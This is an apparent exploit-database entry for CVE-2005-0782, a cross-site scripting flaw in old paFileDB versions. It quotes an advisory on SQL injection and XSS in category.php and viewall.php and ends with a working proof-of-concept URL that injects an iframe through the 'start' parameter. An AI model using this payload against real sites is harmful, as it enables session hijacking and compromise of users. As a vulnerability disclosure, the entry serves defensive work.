PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'category.php?start' Cross-Site Scripting
| EKU-ID: 30570 | CVE: CVE-2005-0782;OSVDB-14842 | OSVDB-ID: |
| Author: sp3x@securityreason.com | Published: 2005-03-12 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 30570 | CVE: CVE-2005-0782;OSVDB-14842 | OSVDB-ID: |
| Author: sp3x@securityreason.com | Published: 2005-03-12 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. Exploitation of these issues may allow for compromise of the software, session hijacking, or attacks against the underlying database. http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></iframe>&sortby=date